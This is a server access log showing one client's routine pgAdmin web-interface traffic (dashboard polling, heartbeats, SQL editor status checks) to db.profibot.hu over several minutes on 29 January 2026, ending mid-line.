200 - POST https db.profibot.hu "/misc/cleanup" [Client 84.1.26.27] [Length 0] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:13:56:20 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 271] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:13:56:21 +0000] - 200 200 - GET https db.profibot.hu "/sqleditor/status/3857941" [Client 84.1.26.27] [Length 156] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/sqleditor/panel/3857941?is_query_tool=true&sgid=1&sid=2&did=16384&database_name=service_finder" +[29/Jan/2026:13:56:23 +0000] - 200 200 - GET https db.profibot.hu "/sqleditor/status/3857941" [Client 84.1.26.27] [Length 156] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/sqleditor/panel/3857941?is_query_tool=true&sgid=1&sid=2&did=16384&database_name=service_finder" +[29/Jan/2026:13:56:26 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 271] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:13:56:31 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 271] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:13:56:36 +0000] - 200 200 - POST https db.profibot.hu "/misc/heartbeat/log" [Client 84.1.26.27] [Length 91] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:13:56:36 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 271] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:13:56:41 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 271] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:13:56:46 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 271] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:13:56:51 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 271] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:13:56:52 +0000] - 200 200 - GET https db.profibot.hu "/sqleditor/status/3857941" [Client 84.1.26.27] [Length 156] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/sqleditor/panel/3857941?is_query_tool=true&sgid=1&sid=2&did=16384&database_name=service_finder" +[29/Jan/2026:13:56:54 +0000] - 200 200 - GET https db.profibot.hu "/sqleditor/status/3857941" [Client 84.1.26.27] [Length 156] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/sqleditor/panel/3857941?is_query_tool=true&sgid=1&sid=2&did=16384&database_name=service_finder" +[29/Jan/2026:13:56:55 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2?chart_names=" [Client 84.1.26.27] [Length 2] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:13:57:01 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 271] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:13:57:06 +0000] - 200 200 - POST https db.profibot.hu "/misc/heartbeat/log" [Client 84.1.26.27] [Length 91] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:13:57:06 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 271] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:13:57:11 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 271] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:13:57:16 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 271] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:13:57:21 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 271] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:13:57:26 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 271] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:13:57:31 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 271] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:13:57:36 +0000] - 200 200 - POST https db.profibot.hu "/misc/heartbeat/log" [Client 84.1.26.27] [Length 91] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:13:57:36 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 271] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:13:57:41 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 271] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:13:57:46 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 271] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:13:57:51 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 271] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:13:57:56 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 271] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:13:58:55 +0000] - 200 200 - POST https db.profibot.hu "/misc/heartbeat/log" [Client 84.1.26.27] [Length 91] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:13:58:55 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 271] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:13:59:55 +0000] - 200 200 - POST https db.profibot.hu "/misc/heartbeat/log" [Client 84.1.26.27] [Length 91] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:13:59:55 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 271] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:14:00:55 +0000] - 200 200 - POST https db.profibot.hu "/misc/heartbeat/log" [Client 84.1.26.27] [Length 91] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:14:00:55 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 271] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:14:01:55 +0000] - 200 200 - POST https db.profibot.hu "/misc/heartbeat/log" [Client 84.1.26.27] [Length 91] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:14:01:55 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 271] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:14:01:55 +0000] - 200 200 - POST https db.profibot.hu "/misc/cleanup" [Client 84.1.26.27] [Length 0] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:14:02:55 +0000] - 200 200 - POST https db.profibot.hu "/misc/heartbeat/log" [Client 84.1.26.27] [Length 91] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:14:02:55 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 271] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:14:03:13 +0000] - 200 200 - POST https db.profibot.hu "/misc/heartbeat/log" [Client 84.1.26.27] [Length 91] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:14:03:13 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 271] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:14:03:13 +0000] - 200 200 - GET https db.profibot.hu "/sqleditor/status/3857941" [Client 84.1.26.27] [Length 156] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/sqleditor/panel/3857941?is_query_tool=true&sgid=1&sid=2&did=16384&database_name=service_finder" +[29/Jan/2026:14:03:15 +0000] - 200 200 - GET https db.profibot.hu "/sqleditor/status/3857941" [Client 84.1.26.27] [Length 156] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/sqleditor/panel/3857941?is_query_tool=true&sgid=1&sid=2&did=16384&database_name=service_finder" +[29/Jan/2026:14:03:15 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2?chart_names=" [Client 84.1.26.27] [Length 2] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:14:03:17 +0000] - 200 200 - GET https db.profibot.hu "/sqleditor/status/3857941" [Client 84.1.26.27] [Length 156] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/sqleditor/panel/3857941?is_query_tool=true&sgid=1&sid=2&did=16384&database_name=service_finder" +[29/Jan/2026:14:03:18 +0000] - 200 200 - POST https db.profibot.hu "/settings/store" [Client 84.1.26.27] [Length 77] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:14:03:19 +0000] - 200 200 - GET https db.profibot.hu "/sqleditor/status/3857941" [Client 84.1.26.27] [Length 156] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/sqleditor/panel/3857941?is_query_tool=true&sgid=1&sid=2&did=16384&database_name=service_finder" +[29/Jan/2026:14:03:19 +0000] - 200 200 - POST https db.profibot.hu "/settings/store" [Client 84.1.26.27] [Length 77] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:14:03:20 +0000] - 200 200 - POST https db.profibot.hu "/settings/save_application_state" [Client 84.1.26.27] [Length 90] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/sqleditor/panel/3857941?is_query_tool=true&sgid=1&sid=2&did=16384&database_name=service_finder" +[29/Jan/2026:14:03:20 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 271] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:14:03:21 +0000] - 200 200 - GET https db.profibot.hu "/sqleditor/status/3857941" [Client 84.1.26.27] [Length 156] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/sqleditor/panel/3857941?is_query_tool=true&sgid=1&sid=2&did=16384&database_name=service_finder" +[29/Jan/2026:14:03:21 +0000] - 200 200 - POST https db.profibot.hu "/sqleditor/query_tool/start/3857941" [Client 84.1.26.27] [Length 137] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/sqleditor/panel/3857941?is_query_tool=true&sgid=1&sid=2&did=16384&database_name=service_finder" +[29/Jan/2026:14:03:21 +0000] - 200 200 - GET https db.profibot.hu "/sqleditor/poll/3857941" [Client 84.1.26.27] [Length 310] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/sqleditor/panel/3857941?is_query_tool=true&sgid=1&sid=2&did=16384&database_name=service_finder" +[29/Jan/2026:14:03:21 +0000] - 200 200 - POST https db.profibot.hu "/sqleditor/query_history/3857941" [Client 84.1.26.27] [Length 90] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/sqleditor/panel/3857941?is_query_tool=true&sgid=1&sid=2&did=16384&database_name=service_finder" +[29/Jan/2026:14:03:23 +0000] - 200 200 - GET https db.profibot.hu "/sqleditor/status/3857941" [Client 84.1.26.27] [Length 156] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/sqleditor/panel/3857941?is_query_tool=true&sgid=1&sid=2&did=16384&database_name=service_finder" +[29/Jan/2026:14:03:25 +0000] - 200 200 - GET https db.profibot.hu "/sqleditor/status/3857941" [Client 84.1.26.27] [Length 156] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/sqleditor/panel/3857941?is_query_tool=true&sgid=1&sid=2&did=16384&database_name=service_finder" +[29/Jan/2026:14:03:25 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 271] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:14:03:31 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 271] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:14:03:36 +0000] - 200 200 - POST https db.profibot.hu "/misc/heartbeat/log" [Client 84.1.26.27] [Length 91] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:14:03:36 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 271] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:14:03:41 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 271] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:14:03:46 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 271] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:14:03:51 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 271] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:14:03:56 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 271] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:14:04:01 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 271] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:14:04:06 +0000] - 200 200 - POST https db.profibot.hu "/misc/heartbeat/log" [Client 84.1.26.27] [Length 91] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:14:04:06 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 271] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:14:04:11 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 271] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:14:04:16 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 271] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:14:04:21 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 271] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:14:04:26 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 271] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" 